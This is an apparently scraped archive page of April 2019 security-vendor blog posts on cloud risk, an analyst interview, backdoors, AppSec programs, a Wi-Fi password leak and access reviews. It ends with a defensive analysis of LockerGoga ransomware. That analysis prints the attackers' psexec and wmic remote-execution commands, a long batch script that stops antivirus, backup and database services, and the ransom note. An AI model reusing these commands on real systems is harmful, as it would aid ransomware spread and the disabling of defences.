Monthly Archives: April 2019

Test Your Knowledge on Cloud Adoption and Risks

Our data lives in the cloud, and nearly a quarter of it requires protection to limit our risk. You won’t be able to get far in your transformation to the cloud without learning the sources of cloud data risk and how to circumnavigate them.

In our latest Cloud Adoption and Risk Report, we analyze the types of sensitive data in the cloud and how it’s shared, examine IaaS security and adoption trends, and review common threats in the cloud. Test your knowledge on the latest cloud trends and see if your enterprise understands the basics of cloud-related risks.

Not prepared? Lucky for you this is an “open-book” test. Find some cheat sheets and study guides below.

Report: Cloud Adoption and Risk Report 2019

Blog: Cloud Security Risks – It’s not black and white

MVISION Cloud Data Sheet

MVISION Cloud

Note: There is a widget embedded within this post, please visit the site to participate in this post's widget.

The post Test Your Knowledge on Cloud Adoption and Risks appeared first on McAfee Blogs.

Behind the Screens: An Interview with Trystan Orr

Trystan OrrCybersecurity is best approached holistically—by combining human, physical, and technical efforts together to mitigate threats. But how exactly does the human element play a role?  To grasp just how humans and psychology are central to the cybersecurity industry, we spoke to our very own Security Operations Center Analyst, Trystan Orr.

Q:  How did you first become interested in cybersecurity?

A:  I’ve been interested in technology since I was very young—I was introduced to computers and video games early.  But there was no particular turning point that got me into cybersecurity; it was more of a slow realization.  I took a couple of coding courses in high school and really liked them.  Then, in college, I took a security class and received my Security+ certification.  I really enjoyed just how pervasive security is: in anything you do, you have to consider security.

“At the same time, I started to notice a strong correlation between psychology and security. It’s about the way humans interact with the technology, and that’s why cybersecurity hit a note with me.  Humans can be your greatest risk- and your greatest strength.”

Q:  How do you apply your understanding of psychology to your job as a security analyst?

A:  One of the key parts of my job as an analyst is thinking of the business need that accompanies security initiatives.  For example, when a security alert is triggered, you have to think about the people behind the screens that triggered the alert.  This is where psychology comes in.  Once you have an understanding of who they are and what they’re doing in their day-to-day, you can respond to the alert.  You don’t want to suggest something that slows down the business, or stops the user from doing what they need to do.

Understanding the user, the human, allows us to offer these custom solutions.

Q:  Looking ahead a few years, what do you predict will be the next big change in the industry?

A:  Awareness.  I think people are becoming more aware of security, which is exciting to see.  For instance, users are becoming more aware of phishing and the importance of reporting potential phishing emails.

“I think part of this increased awareness is a shift from thinking of cybersecurity as a purely technological problem, to a human problem as well.  Users are starting to see the role they play in cybersecurity.” 

Q:  What do you see as the value of encouraging women to enter the industry?

A:  I think including more women in the industry brings different viewpoints that are valuable in discussion and problem-solving. It’s becoming much more apparent that you have to have different people and different personalities to be effective. If you have a different viewpoint, you also have different experiences backing up that viewpoint.

This is especially important in security; you have to be able to have open discussions about how certain security measures affect the user’s risk and productivity.  The goal is to understand what’s best for the user in order to offer the best solution.  This is best achieved when a variety of different viewpoints are brought to the table.

Q:  What advice do you have for anyone interested in entering the cybersecurity industry?

A:  When I first started in the industry as an intern, I didn’t have a security background.  I understood what was going on, but there was a lot I didn’t know. I realized that you must be completely unafraid to ask questions—before you start a new job or internship, and then throughout the entire time you’re there.

There’s a lot you can learn on your own too.  If you are even a little interested, you don’t have to pay loads of money to learn more about the industry.  Always be motivated and open to new ways you can learn.

To hear from more inspiring women in cybersecurity, check out our series.

The post Behind the Screens: An Interview with Trystan Orr appeared first on GRA Quantum.

Learning From the Vodafone-Huawei Backdoor Scandal

Veracode Vodafone Huawei Backdoor April 2019

Yesterday, Bloomberg reported that Vodafone uncovered hidden backdoors in Huawei equipment used for the carrier’s Italian business, which could have given Huawei unauthorized access to Italian homes and businesses. The alleged backdoors were found in 2011 and 2012, and Vodafone told Bloomberg that the issues were resolved at the time.

However, the BBC published a piece this morning in which Vodafone denied the Bloomberg report, citing a spokesperson who says that, "The 'backdoor' that Bloomberg refers to is Telnet, which is a protocol that is commonly used by many vendors in the industry for performing diagnostic functions. It would not have been accessible from the internet.”

Further, the spokesperson indicated that Bloomberg was incorrect in saying that Huawei could have had unauthorized access to the carrier’s Italian network, nor does Vodafone have evidence of any unauthorized access.

According to the BBC, Vodafone took some time off of deploying Huawei equipment in its core networks until a few issues are resolved – namely that Huawei has been accused of being controlled by the Chinese government, which could pose a security risk. The US encouraged allies not to use the equipment in 5G networks, with Secretary of State Mike Pompeo saying the U.S. wouldn't be able to work with nations using the Chinese technology.

What’s the Deal with Backdoors?

Backdoors are a method of bypassing authentication or other security controls in order to access a computer system or the data contained on that system. They can exist at the system level, in a cryptographic algorithm, or within an application. Some backdoors are included in software intentionally, however, they can still pose a serious threat if uncovered by the wrong people.

According a paper from Veracode CTO Chris Wysopal and Veracode Chief Research Officer Chris Eng, backdoored software enables attackers to gain access to highly secure systems that are otherwise rigorously locked down and monitored. The network traffic to and from an application backdoor will most often look like typical usage of the networked application.

For instance, the network traffic of an attacker using backdoored blog software will look like the typical web traffic of a blog user. This will enable them to bypass any network IDS protection. Since the backdoored software is installed by the system operator and is legitimate software it will typically bypass anti-virus software protection.

Many attackers will place backdoors in the source code of software that they have legitimate access to simply because it is a challenge and because they can. They have no intention initially of compromising systems where the software will be installed but take the opportunity because they may want to use the backdoor in the future.

Companies like Apple have forsaken backdoors, and has gone as far as to create their hardware without third-party access to ensure an acceptable level of protection for users and their personal information.

Curious to find out if you have backdoors in your code? Get in touch so we can help.

Your AppSec Program Can Make Your Developers and Your CFO Happy

Veracode AppSec Developers CFO Dynamic Analysis

While cybersecurity risk is steadily growing, so too is the recognition that application security (AppSec) is critical to protecting valuable enterprise resources. More than ever, ensuring that you have a program that spans the entire SDLC is critical to preventing breaches into your organization and customer data. Just as it is important to inventory and secure all of the applications in your portfolio, it’s equally important that your applications are coded securely. Let’s be real: there are a few ways that shifting your application security program left can go wrong. This can include purchasing solutions that don’t really fit the needs of your organization, failing to determine what flaws need fixing first in order to avoid breach, and measuring success against the wrong metrics. This can cost you valuable resources, including your developers’ time and energy, your clients’ trust – and incite the ire of your organization’s CFO.

Here are three tips for running a developer-friendly AppSec program that saves your organization’s most precious resources.

Create Strong Application Security Policies

You know how you treat each email you receive with varying levels of attention and detail? The same sort of policies should be implemented when it comes to fixing flaws found in your software. Like any tool or methodology, AppSec requires a strong structural framework to deliver maximum results. A broadly defined and unfocused program, and the absence of strong AppSec policies, can lead to teams chasing down every flaw and fix. Essentially, you’re running the risk of overwhelming your developers who will no longer have the time or energy to take threats seriously.

There is no one-size-fits-all framework when it comes to creating application security policy (here’s a guide to get you started). It’s really a matter of setting the bar at the right risk and protection level, determining which flaws really matter, understanding remediation and mitigation, and keeping an eye on third-party applications and open source components. Focusing on AppSec standards, like OWASP Top 10, and balancing the needs of your organization will position you for maximum performance and protection, and help you avoid developer burnout.

Identify Appropriate Metrics

The right set of metrics and key performance indicators (KPIs) can greatly simplify and streamline both your software development and your application security. There are a few other metrics to consider beyond meeting your organization’s policy requirements. For example, organizations that have adopted Agile and DevSecOps will find themselves scanning applications and code more frequently. This kind of scanning, when done through automated integration with development systems and at the times best aligned for the development team, can limit the number of vulnerabilities introduced in the Testing and Production stages. Ensuring scan frequency also means reduced mean time to remediate (MTTR) – Veracode’s State of Software Security Volume 9 found that development teams who scanned 300 or more times per year are fixing flaws 11.5x faster than other organizations.

Another metric to consider is flaw density. Flaw density provides a way of looking at the number of flaws produced from a static analysis over the size of the application and can provide directional guidance when comparing groups of applications. A high flaw density simply means more flaws to address, allowing the opportunity to determine where best to use AppSec resources and prioritize flaws accordingly. The beauty of implementing a developer-friendly AppSec program is that it decreases flaw density over time. The Total Economic ImpactTM of the Veracode Application Security Platform, a Forrester Consulting study, shows that prior to using Veracode, the composite organization experienced 60 flaws per MB of code. After adopting the Veracode platform and integrating tools into their CI/CD pipeline, the composite saw a reduction in security flaws of 50% to 90% over three years.

Ensuring that your team has access to actionable results from all application security testing scans performed in a single platform makes coordinating remediation between security, development, and other IT teams easier and more efficient. It also simplifies your ability to measure against the metrics and KPIs set for your organization. To learn more about how to measure your AppSec program, check out the Everything You Need to Know About Measuring Your AppSec Program guide.

Select the Right Solutions

When it comes to AppSec, you need a combination of solutions to ensure that you’re securing your applications at every stage – that’s right, there’s still no silver bullet in security. In the Forrester Consulting study, the organizations interviewed used the Veracode Platform to build stringent security controls and integrate application security testing into their CI/CD pipeline. In addition to using Veracode Static Analysis and Veracode Dynamic Analysis, these organizations shifted security left using Veracode Greenlight and Veracode Software Composition Analysis to identify issues at inception in the SDLC.

As a result, they found that developers were introducing fewer flaws to their code and that the flaws they did find took less time to resolve because we are able to offer contextual remediation advice for those security flaws. Since security flaws were caught earlier in the SDLC, the organization saw a 90 percent reduction in time required to resolve these flaws. Resolutions which previously took 2.5 hours on average were reduced to 15 minutes.

With MTTR included in your overall metrics, it’s important that your application security solutions are designed for speed AND a low false positive rate. This means that security and development teams will spend less time sorting through results to find actual vulnerabilities, and spend more time fixing what matters so that they can move on to other projects.

Developing an AppSec Road Map Saves Time and Money

Organizations need to conduct security testing at the speed of modern day software development in order to maintain tight product roadmap deadlines and increase speed to market. When your teams take the time to understand the bigger picture, the solutions that they need to get the job done well and done efficiently, and they’re able to save time and money doing it, everybody wins. Your development teams will have the space to make your next standout product or feature. You will have the resources to invest in furthering their development education. Your applications will be more secure and your entire organization will be the better for it.

Wi-Fi Woes: Android Hotspot App Leaves 2 Million Passwords Exposed

Logging onto a free Wi-Fi network can be tempting, especially when you’re out running errands or waiting to catch a flight at the airport. But this could have serious cybersecurity consequences. One popular Android app, which allowed anyone to search for nearby Wi-Fi networks, was recently left exposed, leaving a database containing over 2 million network passwords unprotected.

How exactly were these passwords exposed? The app, which had been downloaded by millions of users, allowed anyone to search for Wi-Fi networks in their area. The app also lets users upload their Wi-Fi network passwords from their devices to its database for others to use. When the database was left exposed and unprotected, anyone could access and download its contents. Each record in the database contained the Wi-Fi network name, its precise geolocation, its basic service set identifier, and the network password in plaintext. Because the app didn’t require users to obtain permission from the network owner, it would be quite easy for a cybercriminal to modify router settings and point unsuspecting users to malicious websites. What’s more, a threat actor could also read unencrypted traffic that goes across a wireless network, allowing them to steal passwords and private data.

Thankfully, the web host was able to take down the database containing the Wi-Fi passwords within a day of being notified. But it’s important for users to be aware of the cybersecurity implications that free or public Wi-Fi presents. Check out the following tips to help protect your data:

  • Change your Wi-Fi password. If you think your password may have been affected by this exposure, err on the side of caution and reset it. Be sure to make your new password complex and unique.
  • Keep your network password private. Wi-Fi networks could be susceptible to a number of threats if their passwords are left in the wrong hands. Only share your passwords with family, friends, and those you trust, and never upload your password to a public database for strangers to use.
  • Safeguard your online privacy. Use a security solution like McAfee Safe Connect to encrypt your online activity, protect your privacy by hiding your IP address, and better defend against cybercriminals.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Wi-Fi Woes: Android Hotspot App Leaves 2 Million Passwords Exposed appeared first on McAfee Blogs.

What is Rubber Stamping and Why is it a Serious Cybersecurity Concern?

Although it is not common practice these days to use the red “APPROVED” physical ink stamp, the act of bulk approving (or denying) requests without the necessary time invested or research conducted is as popular as ever. Though this can occur in any department across any organization, this practice of rubber-stamping is particularly problematic when related to the review of access to IT resources. Bulk approvals of requests to have access to any of the various systems and assets quickly becomes a security concern. In order to avoid giving into the temptation to rush approvals of these requests without adequate review, organizations must first understand the damage that can result from overusing approvals, why it happens, and how this can be prevented.

The Dangers of Too Much Access

User access and how it is managed greatly impacts the risk of insider threats, which have become all too common. In fact, according to a survey completed by Cybersecurity Insiders, over 50 percent of organizations surveyed experienced an insider attack in the last twelve months. Approving everyone for any access they apply for, or not adequately reviewing user access periodically, provides ample opportunity for both malicious and accidental insider threats.

Dissatisfied employees pose a unique risk given their knowledge of the organization and their sometimes nefarious motivations. If they know the approval process is not being monitored or access is not being periodically reviewed, they could easily submit a request to access sensitive data which they could then misuse. It could take months before their activity was discovered.

Accidental or negligent misuse of access is also considered an insider threat. Employees may not understand exactly what access they need and end up asking for and being approved for more privilege than they require; they may even request access to the wrong system or asset entirely. The result is often errors in how the access is used. Failing to govern exactly who is asking for what and why they need it creates an environment primed for increased errors.

Additionally, limiting user access is a key component of many regulations like GDPR, Sarbanes Oxley (SOX), and HIPAA, whether it be through the application of proper approval processes or the periodic review of access. Frequent rubber stamping could result in being out of compliance, opening your organization up to potential fines, or worse.

Certification Fatigue and Information Underload: Why Rubber Stamping Occurs

Approving entitlements without a second glance is dangerous. So why is it so common?

Firstly, those in charge of approving access requests or periodically reviewing large lists of user entitlements are often inundated with them, causing certification fatigue. In order to get through the list and get back to work, they simply grant them all. Essentially, they may be busy enough that the only type of access review or approval that will happen in a timely manner is a careless one.

Secondly, access reviews especially are often presented in a confusing format, or an unreadable one. Spreadsheets with this information are hard to read and may not provide enough context to determine if the existing access is actually needed. There are several considerations which may not be listed in a spreadsheet, like how commonly the type of access requested is granted for a given job role, or if it is only needed for a limited time or purpose. With potentially hundreds of requests in need of action, it’s impractical to expect a reviewer or approver to take the time to research each request.

Ultimately, these kinds of reviews require a human eye and a clear understanding of the context in which the access is requested or has been granted. A balance must be struck between efficiency, accuracy, and security. As long as this process is manual, without improvements in the manner which the data are presented to the user, accuracy is a difficult goal to achieve.

Providing Access Accurately and Safely with a Certification Solution

Core Certify provides the context approvers need to make an informed decision in a visual format that allows users to clearly and quickly see common user entitlements and rapidly identify outliers. Core Certify works as a standalone solution, or as part of a suite that enables an organization to also take a graphic approach to periodic or ad-hoc access reviews.

In addition, the same visual, context-driven approach is available for role creation. To see it for yourself, as well as the rest of the Visual Identity Suite, get a personalized demo today.

English

cs-what-is-rubber-stamping-resize.png

Identity and Access Management
Big text: 
Blog
Resource type: 
Blogs

How Veracode Security Program Managers Benefit Your AppSec Program

The application security space is a complicated environment with a vast landscape of roles, development methodologies, and tech stacks. Developers, security leads, risk analysts, Scrum masters, vendor managers, operations teams, and system architects are all on the scene, just to name a few. 

If we compare the land of AppSec to the agriculture industry, your Veracode Security Program Managers are the farmers, and secure software is our crop. Our calloused hands are dirty with application security, and we thrive on lending our green thumb to your program, so you can achieve your security and organizational goals. 

This summer marks my two-year tenure as a Veracode Security Program Manager. I support about 30 different customer organizations in the Eastern US, and I specialize in scaling new application security initiatives into best-in-class programs. We are all about delivering value here at Veracode, and I wanted to shed some light on how Security Program Managers can help guide you on your AppSec journey.

We’re Here For You

Whether you need us for one hour per month, or 16 hours a week, we’ve got your back. We are a part of the larger Services team within Veracode, and we’re proud of it. Some of us support 250 customers, some of us support three customers, and most of us are somewhere in between. Regardless of your level of service, you will always be partnered with a Veracode Security Manager to help you succeed.

As Security Program Managers, most of our time is spent communicating with our customers. Although Veracode may be one tool in your program, we understand how the solution fits into your larger security landscape, and we are experts in the space. Internally, we share what works (and what doesn’t work) with each other to fine tune our best-practice methods.   

We’re an Extension of Your Team

Although we are process and workflow wizards, there may be times when we don’t have the answer to your questions right away. However, we usually know who will. Veracode Security Program Managers act on your behalf as corporate liaisons, and we’re not shy about asking for help when we don’t know something.           

Throughout the life of your program, you’ll work with us to identify organizational challenges, program goals, and success metrics. The combination of these tools and our programmatic approach holds you and your team accountable. Need help integrating Veracode results into your SIEM or want to discuss the best way to manage your CI/CD pipeline? We know some people.   

We Help You Achieve Security as a Competitive Advantage

Kick-off calls, platform demos, status calls, and program review meetings equip us with visibility into the health of your program. These touchpoints, combined with a blend of analytics, strategic expertise, and a shared passion for efficiency, are the base to our secret sauce for your success. We’re obsessed with helping you lessen your risk of failure and saving you money, all while enabling your organization to become more secure as a competitive advantage.

Your Veracode Security Program Manager will have insight into our newest programs and resources to help you achieve your security goals. Lean on us to help you discover a list of your applications that already qualify for the free Veracode Verified program. We’ll also keep you up to speed on our latest and greatest free webinars, which are released on a monthly basis. Becoming familiar with your program enables us to send you content tailored to your initiatives. Let us dig through the noise and send you the right resources.

We Evolve With You

The pressure to produce more code more quickly will only compound over time. Veracode Security Program Managers are here to ensure your great software is also secure, all while helping you move fast. While speed is top of mind for us, accuracy is built into our DNA. As a team, we are passionate about staying ahead of emerging market changes and the latest technology trends.   

We know how to leverage our enhanced Veracode Analytics tool in the platform to gain immediate insight into your program to identify potential risk, areas to improve, and strategic next steps. We can also help you learn how to create and share custom reports that are meaningful to both you and your business. 

Your organization is working hard to create software that’s changing the world; lean on a Veracode Security Program Manager as a trusted advisor to help secure it. Together, we can plant the seeds for bold innovations and pioneer new discoveries.     

Check out our website, to learn more about our Services organization.

LockerGoga Ransomware Family Used in Targeted Attacks

Initial discovery

Once again, we have seen a significant new ransomware family in the news. LockerGoga, which adds new features to the tried and true formula of encrypting victims’ files and asking for payment to decrypt them, has gained notoriety for the targets it has affected.

In this blog, we will look at the findings of the McAfee ATR team following analysis of several different samples. We will describe how this new ransomware works and detail how enterprises can protect themselves from this threat.

Technical analysis

LockerGoga is a ransomware that exhibits some interesting behaviors we want to highlight. Based on our research, and compared with other families, it has a few unique functions and capabilities that are rare compared to other ransomware families that have similar objectives and/or targeted sectors in their campaigns.

In order to uncover its capabilities, we analyzed all the samples we found, discovering similarities between them, as well as how the development lifecycle adds or modifies different features in the code to evolve the ransomware in a more professional tool used by the group behind it.

One of the main differences between LockerGoga and other ransomware families is the ability to spawn different processes in order to accelerate the file encryption in the system:

Like other types of malware, LockerGoga will use all the available CPU resources in the system, as we discovered on our machines:

Most of the LockerGoga samples work the same way but we observed how they added and removed certain types of functionality during their development lifecycle.

The ransomware needs be executed from a privileged account.

LockerGoga works in a master/slave configuration. The malware begins its infection on an endpoint by installing a copy of itself on the %TEMP% folder.

After being copied, it will start a new process with the -m parameter.

The master process runs with the -m parameter and is responsible for creating the list of files to encrypt and spawning the slaves.

The slave processes will be executed with a different set of parameters as shown below. Each slave process will encrypt only a small number of files, to avoid heuristic detections available in endpoint security products. The list of files to encrypt is taken from the master process via IPC, an interface used to share data between applications in Microsoft Windows. The communication is done through IPC using a mapped section named SM-<name of binary>.

Here is the IPC technique used by LockerGoga:

  • The master process (run as <LockerGogaBinary> -m) creates a named section on the system for IPC.
  • The section is named “SM-tgytutrc”.
  • The master ransomware process posts the filepath of the file to be encrypted to the named section “SM-tgytutrc”.
  • This section is used by the slave processes to pick up the filepath and encrypt the target file.

Sandbox replication of master process screenshot below showing:

  • Creation of the named section.
  • Subsequent creation of slave processes to encrypt target files on the endpoint.

Sandbox replication of slave process (encryption process) below showing:

  • Obtaining access to the section created by the master process.
  • Reading and encryption of a target file found based on the filepath specified in the named section.

The ransomware creates multiple slave processes on the endpoint to encrypt files. Some analysts believe this is the case simply because it speeds up the encryption process, but we are not convinced as the same outcome can be achieved via a multi-threaded approach in the ransomware process instead of a multi-process approach.

Instead, we suspect this approach is adopted for the following reasons:

  • Footprint: If every encryption process encrypts only a small number of files on the endpoint and terminates, then the overall footprint of the attack on the system decreases since it may be difficult to co-relate multiple encryption processes to the same threat.
  • Sandbox Bypass: Some sandbox-based detection systems monitor the threshold of the number of files written on the system and may co-relate it to the file extensions being written to. E.g. If a process reads, say, 200 files on the sandbox but only creates files with one specific extension (typical of ransomware – Extn “.locked” in the case of LockerGoga) then this can be considered anomalous behavior. LockerGoga may be able to bypass such detection techniques.
  • File I/O based detection bypass: A multi-process-based approach makes sure that the amount of I/O (File/Disk I/O etc.) for each encryption process is within a certain limit, thus bypassing detection techniques that monitor exorbitant I/O based detection.
  • Reliability: Even if one encryption process is manually terminated by an end-user, as long as the master ransomware process is running the files will continue to be encrypted by new slave processes. If the ransomware process does not use the multi-process approach, then terminating the ransomware process stops the encryption on the endpoint.

Username Administrator:

Username Tinba:

The author implemented a logging function that can be enabled if you callout the sample in execution using the parameter “-l” to store all the results in a file called ‘log.txt’ in the root C drive:

During execution we enabled the log function and saw how the ransomware encrypts the system, causing high CPU usage and opening the ransom note during the process. This is the aspect in an infected system:

As we executed the sample with the log function, we could access this file to check the status of the encryption. Obviously, this most likely a debug function used by the developer.

In order to know how the ransomware works, and with the help of the log function enabled, we could establish the order of LockerGoga to encrypt the system:

  • Log file creation in the C: drive
  • Folder and file enumeration
  • File encryption & ransom note creation in the desktop folder.

One interesting thing to mention is that, before encrypting any file in the system, the malware will search for files in the trashcan folder as the first option. We are not certain why it takes this unusual step, though it could be because many people do not empty their recycle bins and the ransomware is looking to encrypt even those files that may no longer be required:

LockerGoga will start to enumerate all the folders and files in the system to start the encryption process. This enumeration is done in parallel, so we can expect the process wouldn’t take much time.

After the enumeration the ransomware will create the ransom note for the victim:

The ransom note was created in parallel with the encrypted files, and it is hardcoded inside the sample:

Like other ransomware families, LockerGoga will create the ransom note file to ask the user to pay to recover their encrypted files. We highly recommend not paying under any circumstance so as not to continue funding an underground business model. In case of a ransomware infection, please check https://www.nomoreransom.org

Below is an example of the ransom note content on an infected machine:

Greetings!

There was a significant flaw in the security system of your company.

You should be thankful that the flaw was exploited by serious people and not some rookies.

They would have damaged all of your data by mistake or for fun.

 

Your files are encrypted with the strongest military algorithms RSA4096 and AES-256.

Without our special decoder it is impossible to restore the data.

Attempts to restore your data with third party software as Photorec, RannohDecryptor etc.

will lead to irreversible destruction of your data.

 

To confirm our honest intentions.

Send us 2-3 different random files and you will get them decrypted.

It can be from different computers on your network to be sure that our decoder decrypts everything.

Sample files we unlock for free (files should not be related to any kind of backups).

 

We exclusively have decryption software for your situation

 

DO NOT RESET OR SHUTDOWN – files may be damaged.

DO NOT RENAME the encrypted files.

DO NOT MOVE the encrypted files.

This may lead to the impossibility of recovery of the certain files.

 

The payment has to be made in Bitcoins.

The final price depends on how fast you contact us.

As soon as we receive the payment you will get the decryption tool and

instructions on how to improve your systems security

 

To get information on the price of the decoder contact us at:

In parallel of the ransom note creation, the files will start to be encrypted by LockerGoga with the .locked extension appended to all files. This extension has been broadly used by other ransomware families in the past:

LockerGoga has embedded in the code the file extensions that it will encrypt. Below is an example:

The sample has also configured some locations and files that will be skipped in the encryption process so as not to disrupt the Operating System from running.

All the files encrypted by this ransomware will have a specific FileMarker inside:

Note: The FileMarker identifies the ransomware family and the most likely version; in this case it is 1440.

During the investigation we identified the following versions:

  • 1200
  • 1510
  • 1440
  • 1320

Based on the binary compile time and the extracted versions, we observed that the actors were creating different versions of LockerGoga for different targets/campaigns.

After encrypting, LockerGoga executes ‘cipher.exe’ to remove the free space to prevent file recovery in the infected system. When files are deleted on a system, sometimes they are still available in the free space of a hard disk and can theoretically be recovered.

Samples digitally signed:

During our triage phase we found that some of the LockerGoga samples are digitally signed. We are observing from ATR that the latest ransomware pieces used a lower scale and more focused are released digitally signed:

  • MIKL LIMITED
  • ALISA LTD
  • KITTY’S LTD

Digitally signing the malware could help the attackers to bypass some of the security protections in the system.

As part of the infection process, LockerGoga will create a static mutex value in the system, always following the same format:

MX-[a-z]\w+

Examples of mutex found:

MX-imtvknqq

MX-tgytutrc

MX-zzbdrimp

Interesting strings found

In our analysis we extracted more strings from the LockerGoga samples, with interesting references to:

  • LockerGoga
  • crypto-locker
  • goga
E:\\crypto-locker\\cryptopp\\src\\crc_simd.cpp

E:\\crypto-locker\\cryptopp\\src\\rijndael_simd.cpp

E:\\crypto-locker\\cryptopp\\src\\sha_simd.cpp

E:\\crypto-locker\\cryptopp\\src\\sse_simd.cpp

E:\\goga\\cryptopp\\src\\crc_simd.cpp

E:\\goga\\cryptopp\\src\\rijndael_simd.cpp

E:\\goga\\cryptopp\\src\\sha_simd.cpp

E:\\goga\\cryptopp\\src\\sse_simd.cpp

X:\\work\\Projects\\LockerGoga\\cl-src-last\\cryptopp\\src\\crc_simd.cpp

X:\\work\\Projects\\LockerGoga\\cl-src-last\\cryptopp\\src\\rijndael_simd.cpp

X:\\work\\Projects\\LockerGoga\\cl-src-last\\cryptopp\\src\\sha_simd.cpp

X:\\work\\Projects\\LockerGoga\\cl-src-last\\cryptopp\\src\\sse_simd.cpp

The malware developers usually forget to remove those strings in their samples and we can use them to identify new families or frameworks used in their development.

Spreading methods:

The malware is known to be spread in the local network through remote file copy. To do that, a set of .batch files are copied to the remote machines TEMP folder using simple copy:

  • copy xax.bat \\123.123.123.123\c$\windows\temp

The malware will copy itself and the tool PSEXEC.EXE to the same location. Once all the files are copied, the malware will run the .BAT file using the following command:

  • start psexec.exe \\123.123.123.123 -u domain\user -p “pass” -d -h -r mstdc -s accepteula -nobanner c:\windows\temp\xax.bat

Each of these .BAT files contain lines to execute the malware on remote machines. They use the following command:

  • start wmic /node:”123.123.123.123″ /user:”domain\user” /password:”pass” process call create “cmd /c c:\windows\temp\kill.bat”

The batch file above attempts to kill several AV products and disable security tools. At the end of the script, the malware copy on the remote machine is executed from

c:\windows\temp\taskhost.exe.

Due to the presence of these batch files and the fact that the malware binary makes no direct reference to them, we believe that the spreading mechanism is executed manually by an attacker or via an unknown binary. The path, username, and passwords are hardcoded in the scripts which indicate the attacker had previous knowledge of the environment.

The following is a list of all the processes and services disabled by the malware:

One batch file found in the infected systems where LockerGoga was executed will stop services and processes regarding critical services in the system and security software:

net stop BackupExecAgentAccelerator /y net stop McAfeeEngineService /y
net stop BackupExecAgentBrowser /y net stop McAfeeFramework /y
net stop BackupExecDeviceMediaService /y net stop McAfeeFrameworkMcAfeeFramework /y
net stop BackupExecJobEngine /y net stop McTaskManager /y
net stop BackupExecManagementService /y net stop mfemms /y
net stop BackupExecRPCService /y net stop mfevtp /y
net stop BackupExecVSSProvider /y net stop MMS /y
net stop bedbg /y net stop mozyprobackup /y
net stop DCAgent /y net stop MsDtsServer /y
net stop EPSecurityService /y net stop MsDtsServer100 /y
net stop EPUpdateService /y net stop MsDtsServer110 /y
net stop EraserSvc11710 /y net stop MSExchangeES /y
net stop EsgShKernel /y net stop MSExchangeIS /y
net stop FA_Scheduler /y net stop MSExchangeMGMT /y
net stop IISAdmin /y net stop MSExchangeMTA /y
net stop IMAP4Svc /y net stop MSExchangeSA /y
net stop macmnsvc /y net stop MSExchangeSRS /y
net stop masvc /y net stop MSOLAP$SQL_2008 /y
net stop MBAMService /y net stop MSOLAP$SYSTEM_BGC /y
net stop MBEndpointAgent /y net stop MSOLAP$TPS /y
net stop McShield /y net stop MSSQLFDLauncher$TPS /y
net stop MSOLAP$TPSAMA /y net stop MSSQLFDLauncher$TPSAMA /y
net stop MSSQL$BKUPEXEC /y net stop MSSQLSERVER /y
net stop MSSQL$ECWDB2 /y net stop MSSQLServerADHelper100 /y
net stop MSSQL$PRACTICEMGT /y net stop MSSQLServerOLAPService /y
net stop MSSQL$PRACTTICEBGC /y net stop MySQL57 /y
net stop MSSQL$PROFXENGAGEMENT /y net stop ntrtscan /y
net stop MSSQL$SBSMONITORING /y net stop OracleClientCache80 /y
net stop MSSQL$SHAREPOINT /y net stop PDVFSService /y
net stop MSSQL$SQL_2008 /y net stop POP3Svc /y
net stop MSSQL$SYSTEM_BGC /y net stop ReportServer /y
net stop MSSQL$TPS /y net stop ReportServer$SQL_2008 /y
net stop MSSQL$TPSAMA /y net stop ReportServer$SYSTEM_BGC /y
net stop MSSQL$VEEAMSQL2008R2 /y net stop ReportServer$TPS /y
net stop MSSQL$VEEAMSQL2012 /y net stop ReportServer$TPSAMA /y
net stop MSSQLFDLauncher /y net stop RESvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y net stop sacsvr /y
net stop MSSQLFDLauncher$SBSMONITORING /y net stop MSSQLFDLauncher$SHAREPOINT /y net stop SamSs /y
net stop MSSQLFDLauncher$SQL_2008 /y net stop SAVAdminService /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y net stop SAVService /y
net stop MSOLAP$TPSAMA /y net stop MSSQLFDLauncher$TPS /y
net stop MSSQL$BKUPEXEC /y net stop MSSQLFDLauncher$TPSAMA /y
net stop SDRSVC /y net stop SQLSafeOLRService /y
net stop SepMasterService /y net stop SQLSERVERAGENT /y
net stop ShMonitor /y net stop SQLTELEMETRY /y
net stop Smcinst /y net stop SQLTELEMETRY$ECWDB2 /y
net stop SmcService /y net stop SQLWriter /y
net stop SMTPSvc /y net stop SstpSvc /y
net stop SNAC /y net stop svcGenericHost /y
net stop SntpService /y net stop swi_filter /y
net stop sophossps /y net stop swi_service /y
net stop SQLAgent$BKUPEXEC /y net stop swi_update_64 /y
net stop SQLAgent$ECWDB2 /y net stop TmCCSF /y
net stop SQLAgent$PRACTTICEBGC /y net stop tmlisten /y
net stop SQLAgent$PRACTTICEMGT /y net stop TrueKey /y
net stop SQLAgent$PROFXENGAGEMENT /y net stop TrueKeyScheduler /y
net stop SQLAgent$SBSMONITORING /y net stop TrueKeyServiceHelper /y
net stop SQLAgent$SHAREPOINT /y net stop SQLAgent$SQL_2008 /y net stop UI0Detect /y
net stop SQLAgent$SYSTEM_BGC /y net stop SQLAgent$TPS /y net stop VeeamBackupSvc /y
net stop SQLAgent$TPSAMA /y net stop VeeamBrokerSvc /y
net stop SQLAgent$VEEAMSQL2008R2 /y net stop SQLAgent$VEEAMSQL2012 /y net stop VeeamCatalogSvc /y
net stop SQLBrowser /y net stop VeeamCloudSvc /y
net stop SDRSVC /y net stop SQLSafeOLRService /y
net stop SepMasterService /y net stop SQLSERVERAGENT /y
net stop ShMonitor /y net stop SQLTELEMETRY /y
net stop VeeamDeploymentService /y net stop NetMsmqActivator /y
net stop VeeamDeploySvc /y net stop EhttpSrv /y
net stop VeeamEnterpriseManagerSvc /y net stop ekrn /y
net stop VeeamMountSvc /y net stop ESHASRV /y
net stop VeeamNFSSvc /y net stop MSSQL$SOPHOS /y
net stop VeeamRESTSvc /y net stop SQLAgent$SOPHOS /y
net stop VeeamTransportSvc /y net stop AVP /y
net stop W3Svc /y net stop klnagent /y
net stop wbengine /y net stop MSSQL$SQLEXPRESS /y
net stop WRSVC /y net stop SQLAgent$SQLEXPRESS /y net stop wbengine /y
net stop MSSQL$VEEAMSQL2008R2 /y net stop kavfsslp /y
net stop SQLAgent$VEEAMSQL2008R2 /y net stop VeeamHvIntegrationSvc /y net stop KAVFSGT /y
net stop swi_update /y net stop KAVFS /y
